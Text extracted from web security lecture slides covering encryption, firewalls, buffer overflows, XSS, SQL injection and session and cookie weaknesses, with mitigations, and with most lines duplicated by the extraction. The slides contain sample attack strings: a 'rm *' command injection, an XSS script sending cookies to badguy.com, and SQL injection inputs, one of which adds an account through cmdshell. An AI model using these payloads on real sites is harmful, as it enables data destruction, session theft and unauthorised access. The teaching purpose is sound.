1 CS6320 – Web Security L. Grewe Modified from

11

CS6320 – Web SecurityCS6320 – Web Security

L. GreweL. Grewe

Modified from Modified from http://crypto.stanford.edu/cs155/http://crypto.stanford.edu/cs155/

22

IssuesIssues Authentication, AuthorizationAuthentication, Authorization Protecting your system against hackersProtecting your system against hackers Controlling access to critical dataControlling access to critical data Control inbound versus outbound trafficControl inbound versus outbound traffic security versus accessibility tradeoffssecurity versus accessibility tradeoffs security versus capability tradeoffssecurity versus capability tradeoffs multi-tier versus single-tier solutions multi-tier versus single-tier solutions security versus expense tradeoffssecurity versus expense tradeoffs

security and capability versus administrative security and capability versus administrative overhead and complexityoverhead and complexity

33

SolutionsSolutions

Software-based Software-based Hardware-based Hardware-based Freeware versus Commercial Products Freeware versus Commercial Products Use of Security Protocols Use of Security Protocols Cryptography

• Converting messages to unreadable forms...and back

Steganography• Hiding the existence of a message

44

One issue….buffer overflow…things One issue….buffer overflow…things getting bettergetting better

0

5

10

15

20

25

2001 2002 2003 2004 2005 2006

Web (XSS) Buffer Overflow

Source: MITRE CVE trends

Majority of vulnerabilities now found in web software

55

Example Web Site architecture w/ Example Web Site architecture w/ Security ComponentsSecurity Components

IntrusionDetection

System

ApplicationFirewall(WAF)

Fire

wall

LoadBalancer DB

WS1

WS2

WS3

Fire

wall

Authorization

AppServers

66

Attacks of systemsAttacks of systems

Common web-site attacks:Common web-site attacks:

• Denial of ServiceDenial of Service

• Attack the web server (IIS, Apache) :Attack the web server (IIS, Apache) : e.g. control hijacking: CodeRed, Nimda, … e.g. control hijacking: CodeRed, Nimda, … Solutions:Solutions:

• Harden web server: stackguard, libsafe, …Harden web server: stackguard, libsafe, …• Worm defense:Worm defense:

Host based intrusion detection,Host based intrusion detection, Worm signatures generation, shields.Worm signatures generation, shields.

77

FirewallsFirewalls

• A system designed to prevent unauthorized A system designed to prevent unauthorized access to or from a private network. Firewalls access to or from a private network. Firewalls can be implemented in both hardware and can be implemented in both hardware and software, or a combination of bothsoftware, or a combination of both

IP filtering (packet filtering)IP filtering (packet filtering) • = controls access by solely looking at information = controls access by solely looking at information

contained in the IP header of data packets being sent contained in the IP header of data packets being sent to the server. to the server.

Proxy Servers/Application FirewallsProxy Servers/Application Firewalls

88

Web Application FirewallsWeb Application Firewalls

• Prevent some attacks such as:Prevent some attacks such as:• SQL InjectionSQL Injection• Form field tamperingForm field tampering• Cookie poisoningCookie poisoning

Some examplesSome examples::• Imperva Imperva • Kavado InterdoKavado Interdo• F5 TrafficShieldF5 TrafficShield• Citrix NetScaler Citrix NetScaler • CheckPoint Web Intelligence CheckPoint Web Intelligence

99

Message/Information HidingMessage/Information Hiding

Protect some information being sent Protect some information being sent from client to server and vice-versa.from client to server and vice-versa.

Through encryption.Through encryption. Some protocols such as Some protocols such as SSLSSL (secure (secure

socket layer) using encryption to socket layer) using encryption to perform “secure” exchange of perform “secure” exchange of information.information.

1010

EncryptionEncryption

Convert normal, readable data into obscured, unreadable data

Hi There!! Encryption Algorithm m/okuGlilkdskuch

Hi There!! Encryption Algorithm alieka;wk12938*

1111

DecryptionDecryption

Convert obscured, unreadable data into normal, readable data

Hi There!!Decryption Algorithmm/okuGlilkdskuch

Hi There!!Decryption Algorithmalieka;wk12938*

1212

TerminologyTerminology

plaintext - clear readable text ciphertext - unreadable text cipher - algorithm(s) for encryption and

decryption

Hi There!! Encryption Algorithm alieka;wk12938*

Hi There!!Decryption Algorithmalieka;wk12938*

1313

TerminologyTerminology Key -- a secret piece of information that

controls how the encryption algorithm works

Different keys produce different encrypted results

Hi There!! Encryption Algorithm 109291ala;dfwij?

Key: “Citizen Kane”

Hi There!! Encryption Algorithm 398jfasd;k2//ad?

Key: “Citizen Kano”

1414

Symmetric Key TechnologySymmetric Key Technology

Alice wants to send a private/confidential message to Bob

Alice computes c=crypt(message,key)

Sends c to Bob over unsecured wire Bob computes

message=crypt(c,key)

1515

Symmetric Key ApplicationSymmetric Key Application

Password login Alice sends password to computer to

prove identity (authenticity) Problem: Sniffing Solution: Challenge/response

1616

Shared Secret KeyShared Secret Key

Shared secret is great... but how do we distribute it?

1717

Asymmetric Key CryptographyAsymmetric Key Cryptography Instead of one key, have two

• public key• private key

Public key known to everyone and a Private or secret key known only to the recipient of the message.

When John wants to send a secure message to Jane, he uses Jane's public key to encrypt the message. Jane then uses her private key to decrypt it.

Computing private key from public key is very, very difficult (factoring huge number)

1818

Asymmetric Encryption Asymmetric Encryption ExampleExample

John: finds Jane.pub (public key) from her website (or she gives it in an email to John)

John: computes c = crypt(message, Jane.pub)

John: sends c to Jane over unsecured wire

Jane: computes message = crypt(c, Jane.priv)

1919

AdvantagesAdvantages

Key distribution not a problem! Anyone can send a message to Jane Only Jane can decrypt!

2020

Asymmetric Encryption for Asymmetric Encryption for AuthenticationAuthentication

Alice wants to tell Bob the message is really from her!

Digital signature Alice computes c = crypt(message,

Alice.priv) Alice sends c over unsecured wire Anyone can check that Alice is the

sender... by computing message = crypt(c, Alice.pub)

2121

Authenticity + SecrecyAuthenticity + Secrecy

AliceA.priv

A.pub, B.pub, ... BobB.priv

Carl & EveBad People!

“I LUV U”

2222


AliceA.priv



“I LUV U”

B.pub

2323


AliceA.priv



“I LUV U”

B.pub

“This is from A”

2424


AliceA.priv



“I LUV U”

B.pub


A.priv

2525


AliceA.priv



“I LUV U”

B.pub


A.priv

2626


AliceA.priv



“I LUV U”

B.pub


A.priv

2727

Another Solution: Digital Another Solution: Digital CertificatesCertificates

Certificate Authority: publishes that a particular identity goes with a particular public key

Alice gets certificate (identity <=> public key), signed by CA

So if you trust CA, then you can trust the public key

2828

SSL…the ideaSSL…the idea Jane connects to John's server John's server returns

certificate (signed by VeriSign), plus something encrypted w/ John.priv

Jane can verify certificate is valid

Uses public key to decrypt token

John authenticated Jane makes one time session

key k Encrypts w/ John's public key,

sends to John Now, can use symmetric key

cryptography

2929

Attacks…Attacks…

There are many kinds of attacks that There are many kinds of attacks that hackers have donehackers have done

Will mention some more weaknesses Will mention some more weaknesses here ….but, take a class on security, here ….but, take a class on security, cryptography, etc. to get into more cryptography, etc. to get into more details.details.

3030

Attack: Denial of ServiceAttack: Denial of Service

Make the service unavailable Flood of incoming traffic Use robot to launch DOS on server.

Hard to trace identity of attacker. Distributed DOS (DDOS)

• Take over many machines, launch attack simultaneously from many locations

3131

Attack: Buffer OverflowAttack: Buffer Overflow

Bad guy sends a huge, over-sized request to a naïvely implemented (aka buggy) program, overflowing the input buffer

May overwrite data in memory (and/or) program code

May overwrite the return address on the stack of a program in C, so that the procedure call returns somewhere else

3232

How To Avoid Buffer OverflowHow To Avoid Buffer Overflow

Write code carefully Limit input size; read in small chunks

as opposed to reading in whole input Use better languages (e.g. java)

3333

Another Problem >>>>>What about Another Problem >>>>>What about all of the web application code???all of the web application code???

Runs on web server or app server.Runs on web server or app server.• Takes input from web users (via web server)Takes input from web users (via web server)• Interacts with the database and 3Interacts with the database and 3rdrd parties. parties.• Prepares results for users (via web server)Prepares results for users (via web server)

ExamplesExamples: : • Shopping carts, home banking, bill pay, tax Shopping carts, home banking, bill pay, tax

prep, … prep, … • New code written for every web site.New code written for every web site.

Written inWritten in::• C, PHP, Perl, Python, JSP, ASP, …C, PHP, Perl, Python, JSP, ASP, …• Often written with little consideration for Often written with little consideration for

security.security.

3434

Web Application problemsWeb Application problems Inadequate validation of user inputInadequate validation of user input

• Cross site scriptingCross site scripting

• SQL InjectionSQL Injection

• HTTP SplittingHTTP Splitting

Broken session managementBroken session management

• Can lead to session hijacking and data theftCan lead to session hijacking and data theft

Insecure storageInsecure storage

• Sensitive data stored in the clear.Sensitive data stored in the clear.

• Prime target for theft – e.g. egghead, Verizon.Prime target for theft – e.g. egghead, Verizon.

• Note: PCI Data Security Standard (Visa, Mastercard)Note: PCI Data Security Standard (Visa, Mastercard)

3535

A simple exampleA simple example Direct use of user input:Direct use of user input:

http://victim.com/ copy.php ? name=usernamehttp://victim.com/ copy.php ? name=username

copy.php:copy.php:

ProblemProblem: : http://victim.com/ copy.php ? name=“a ; rm *”http://victim.com/ copy.php ? name=“a ; rm *”

(should be: (should be: name=a%20;%20rm%20*name=a%20;%20rm%20* ) )

script name script input

system(“cp temp.dat $name.dat”)

3636

RedirectsRedirects

EZShopper.com shopping cart (10/2004):EZShopper.com shopping cart (10/2004):

http://…/cgi-bin/ loadpage.cgi ? page=urlhttp://…/cgi-bin/ loadpage.cgi ? page=url• Redirects browser to urlRedirects browser to url

Redirects are common on many sitesRedirects are common on many sites• Used to track when user clicks on external linkUsed to track when user clicks on external link• EZShopper uses redirect to add HTTP headersEZShopper uses redirect to add HTTP headers

ProblemProblem: phishing: phishing

http://victim.com/cgi-bin/loadpage ? page=phisher.comhttp://victim.com/cgi-bin/loadpage ? page=phisher.com

• Link to victim.com puts user at phisher.comLink to victim.com puts user at phisher.com

Local redirects should ensure target URL is localLocal redirects should ensure target URL is local

3737

Cross Site Scripting Cross Site Scripting (XSS)(XSS)

3838

The setupThe setup

User input is echoed into HTML response.User input is echoed into HTML response.

ExampleExample: search field: search field

• http://victim.com/search.php ? term = http://victim.com/search.php ? term = appleapple

• search.php responds with:search.php responds with:<HTML> <TITLE> Search Results </TITLE><HTML> <TITLE> Search Results </TITLE>

<BODY><BODY>

Results for <?php echo $_GET[term] ?> :Results for <?php echo $_GET[term] ?> :

. . .. . .

</BODY> </HTML></BODY> </HTML>

Is this exploitable?Is this exploitable?

3939

Answer…..Bad inputAnswer…..Bad input Problem: no validation of input term Problem: no validation of input term

Consider link: (properly URL encoded)Consider link: (properly URL encoded)

http://victim.com/search.php ? term =http://victim.com/search.php ? term =

<script> window.open(<script> window.open(

““http://badguy.com?cookie = http://badguy.com?cookie = ” ” + +

document.cookie ) </script>document.cookie ) </script>

What if user clicks on this linkWhat if user clicks on this link??

1.1. Browser goes to victim.com/search.phpBrowser goes to victim.com/search.php

2.2. Victim.com returnsVictim.com returns

<HTML> Results for <script> … </script><HTML> Results for <script> … </script>

3.3. Browser executes script:Browser executes script: Sends badguy.com cookie for victim.comSends badguy.com cookie for victim.com

4040

What is the problem?What is the problem?

Why would user click on such a link?Why would user click on such a link?• Phishing email in webmail client (e.g. gmail).Phishing email in webmail client (e.g. gmail).

• Link in doubleclick banner adLink in doubleclick banner ad

• … … many many ways to fool user into clickingmany many ways to fool user into clicking

What if badguy.com gets cookie for What if badguy.com gets cookie for victim.com ?victim.com ?• Cookie can include session auth for victim.comCookie can include session auth for victim.com

Or other data intended only for victim.comOr other data intended only for victim.com

Violates same origin policyViolates same origin policy

4141

Worse …Worse …

Attacker can execute arbitrary scripts in browserAttacker can execute arbitrary scripts in browser

Can manipulate any DOM component on victim.comCan manipulate any DOM component on victim.com• Control links on pageControl links on page• Control form fields (e.g. password field) on this Control form fields (e.g. password field) on this

page and linked pages.page and linked pages. Example: inject password field that sends Example: inject password field that sends

password to bad guy.password to bad guy.

Can infect other users: MySpace.com worm.Can infect other users: MySpace.com worm.

4242

MySpace.com MySpace.com (Samy worm)(Samy worm) Users can post HTML on their pagesUsers can post HTML on their pages

• MySpace.com ensures HTML contains noMySpace.com ensures HTML contains no

<script>, <body>, onclick, <a <script>, <body>, onclick, <a href=javascript://>href=javascript://>

• … … but can do Javascript within CSS tags:but can do Javascript within CSS tags:<div <div style=“background:url(‘javascript:alert(1)’)”>style=“background:url(‘javascript:alert(1)’)”>

And can hideAnd can hide ““javascriptjavascript”” asas ““java\nscriptjava\nscript””

With careful javascript hacking:With careful javascript hacking:

• Samy’s worm: infects anyone who visits an infected Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend.MySpace page … and adds Samy as a friend.

• Samy had millions of friends within 24 hours.Samy had millions of friends within 24 hours.

More info: http://namb.la/popular/tech.htmlMore info: http://namb.la/popular/tech.html

4343

Avoiding XSS bugs Avoiding XSS bugs (PHP)(PHP)

Main problem: Main problem: • Input checking is difficult --- many ways to inject scripts Input checking is difficult --- many ways to inject scripts

into HTML.into HTML.

Preprocess input from user before echoing itPreprocess input from user before echoing it

PHP: PHP: htmlspecialcharshtmlspecialchars(string)(string)

& & & " & " " ' " ' ' ' < < < > < > > >

• htmlspecialcharshtmlspecialchars(( "<a href='test'>Test</a>"<a href='test'>Test</a>", ENT_QUOTES); ", ENT_QUOTES);

Outputs: Outputs: <a href='test'>Test</a><a href='test'>Test</a>

4444

httpOnly Cookies httpOnly Cookies (IE)(IE)

BrowserServer

GET …

HTTP Header:Set-cookie: NAME=VALUE ;

HttpOnly

• Cookie sent over HTTP(s), but not accessible to scripts

• cannot be read via document.cookie

• Helps prevent cookie theft via XSS

• … but does not stop most other risks of XSS bugs.

4545

SQL InjectionSQL Injection

4646

The setupThe setup User input is used in SQL queryUser input is used in SQL query

Example: login page (in ASP)Example: login page (in ASP)

set ok = execute(“SELECT * FROM UserTableset ok = execute(“SELECT * FROM UserTable

WHERE username=WHERE username=′ ′ ”” & form(“user”) & & form(“user”) &

“ ′ “ ′ AND password=′ AND password=′ ”” & form(“pwd”) & “ ′ & form(“pwd”) & “ ′ ”” ); );

If not ok.EOF If not ok.EOF

login success login success

else fail;else fail;

Is this a problem?Is this a problem?

4747

The problem …..Bad inputThe problem …..Bad input Suppose user = “ Suppose user = “ ′′ or 1 = 1 --or 1 = 1 -- ” (URL ” (URL

encoded)encoded)

Then scripts does:Then scripts does:

ok = execute( SELECT … ok = execute( SELECT …

WHERE username= WHERE username= ′′ ′ or 1=1 --′ or 1=1 -- … )… )

• The The ““----”” causes rest of line to be ignored. causes rest of line to be ignored.

• Now ok.EOF is always false.Now ok.EOF is always false.

The bad news: easy login to many sites this way.The bad news: easy login to many sites this way.

4848

Worse…Worse…

Suppose user = Suppose user =

′′ exec cmdshellexec cmdshell

′′net user badguy badpwdnet user badguy badpwd′ ′ / ADD / ADD ----

Then script does:Then script does:

ok = execute( SELECT … ok = execute( SELECT …

WHERE username= WHERE username= ′′ ′ exec …′ exec … ))

If SQL server contextIf SQL server context runs as “sa”, attacker gets runs as “sa”, attacker gets account on DB server.account on DB server.

4949

Avoiding SQL injectionAvoiding SQL injection Build SQL queries by properly escaping args: Build SQL queries by properly escaping args: ′ ′ \′ \′

Example: Parameterized SQL: (ASP.NET 1.1)Example: Parameterized SQL: (ASP.NET 1.1)• Ensures SQL arguments are properly escaped.Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand( SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE "SELECT * FROM UserTable WHERE username = @User AND username = @User AND password = @Pwd", dbConnection); password = @Pwd", dbConnection);

cmd.Parameters.Add("@User", Request[“user”] ); cmd.Parameters.Add("@User", Request[“user”] );

cmd.Parameters.Add("@Pwd", Request[“pwd”] ); cmd.Parameters.Add("@Pwd", Request[“pwd”] );

cmd.ExecuteReader(); cmd.ExecuteReader();

In PHP: bound parameters -- similar functionIn PHP: bound parameters -- similar function

5555

App codeApp code Little programming knowledge can be dangerous:Little programming knowledge can be dangerous:

• Cross site scriptingCross site scripting• SQL InjectionSQL Injection• HTTP SplittingHTTP Splitting

What to do?What to do?

• Band-aid: Web App Firewall (WAF)Band-aid: Web App Firewall (WAF) Looks for attack patterns and blocks requestsLooks for attack patterns and blocks requests False positive / false negativesFalse positive / false negatives

• Code checkingCode checking

5656

Code checkingCode checking Blackbox security testing services:Blackbox security testing services:

• Whitehatsec.comWhitehatsec.com

Automated blackbox testing tools:Automated blackbox testing tools:• Cenzic, Cenzic, HailstormHailstorm• Spidynamic, Spidynamic, WebInspectWebInspect• eEye, eEye, RetinaRetina

Web application hardening tools:Web application hardening tools:• WebSSARI [WWW’04] : based on information flowWebSSARI [WWW’04] : based on information flow• Nguyen-Tuong [IFIP’05] : based on taintingNguyen-Tuong [IFIP’05] : based on tainting

5757

Session ManagementSession Management

Cookies, hidden fields, Cookies, hidden fields, and user authenticationand user authentication

5858

Cookie risksCookie risks Danger of storing data on browser Danger of storing data on browser

• User can change valuesUser can change values

Silly exampleSilly example: Shopping cart software.: Shopping cart software.

Set-cookie:Set-cookie: shopping-cart-total = 150shopping-cart-total = 150 ($) ($)

• User edits cookie file (cookie poisoning):User edits cookie file (cookie poisoning):

Cookie:Cookie: shopping-cart-total = 15shopping-cart-total = 15 ($) ($)

• … … bargain shopping.bargain shopping.

Similar behavior with hidden fields:Similar behavior with hidden fields:

<INPUT TYPE=“hidden” NAME=price VALUE=“150”><INPUT TYPE=“hidden” NAME=price VALUE=“150”>

5959

Not so silly …some real sites had Not so silly …some real sites had this issuethis issue

D3.COM Pty Ltd: D3.COM Pty Ltd: ShopFactory 5.8ShopFactory 5.8 @Retail Corporation: @Retail Corporation: @Retail@Retail Adgrafix: Adgrafix: Check It OutCheck It Out Baron Consulting Group: Baron Consulting Group: WebSite ToolWebSite Tool ComCity Corporation: ComCity Corporation: SalesCartSalesCart Crested Butte Software: Crested Butte Software: EasyCartEasyCart Dansie.net: Dansie.net: Dansie Shopping CartDansie Shopping Cart Intelligent Vending Systems: Intelligent Vending Systems: IntellivendIntellivend Make-a-Store: Make-a-Store: Make-a-Store OrderPageMake-a-Store OrderPage McMurtrey/Whitaker & Associates: McMurtrey/Whitaker & Associates: Cart32 3.0 Cart32 3.0 [email protected]: [email protected]: CartMan 1.04CartMan 1.04 Rich Media Technologies: Rich Media Technologies: JustAddCommerce 5.0JustAddCommerce 5.0 SmartCart: SmartCart: SmartCartSmartCart Web Express: Web Express: Shoptron 1.2 Shoptron 1.2

6060

SolutionSolution When storing state on browser MAC data When storing state on browser MAC data

using server secret key.using server secret key.

.NET 2.0:.NET 2.0:• System.Web.Configuration.MachineKey System.Web.Configuration.MachineKey

Secret web server key intended for cookie Secret web server key intended for cookie protectionprotection

• HttpCookie HttpCookie cookie = new HttpCookie(cookie = new HttpCookie(namename,, val val); ); HttpCookie HttpCookie encodedCookie =encodedCookie =

HttpSecureCookie.EncodeHttpSecureCookie.Encode (cookie);(cookie);

• HttpSecureCookie.HttpSecureCookie.DeDecodecode (cookie);(cookie);

6161

Cookie authenticationCookie authentication

Browser Web Server Auth server

POST login.cgiUsername & pwd Validate user

auth=valStore val

Set-cookie: auth=val

GET restricted.htmlCookie: auth=val restricted.html

auth=val

YES/NOIf YES, restricted.html

Check val

6262

Weak authenticators: security riskWeak authenticators: security risk

Predictable cookie authenticatorPredictable cookie authenticator• Verizon Wireless - counterVerizon Wireless - counter• Valid user logs in, gets counter, can view Valid user logs in, gets counter, can view

sessions of other users.sessions of other users.

Weak authenticator generation: [Fu et al. ’01]Weak authenticator generation: [Fu et al. ’01]

• WSJ.com:WSJ.com: cookie = cookie = {user, MAC{user, MACkk(user) }(user) }

• Weak MAC exposes Weak MAC exposes KK from few cookies. from few cookies.

Apache Tomcat: generateSessionID()Apache Tomcat: generateSessionID()• MD5(PRNG) … but weak PRNG [GM’05]. MD5(PRNG) … but weak PRNG [GM’05]. • Predictable SessionID’sPredictable SessionID’s

1 CS6320 – Web Security L. Grewe Modified from

Documents

Transcript of 1 CS6320 – Web Security L. Grewe Modified from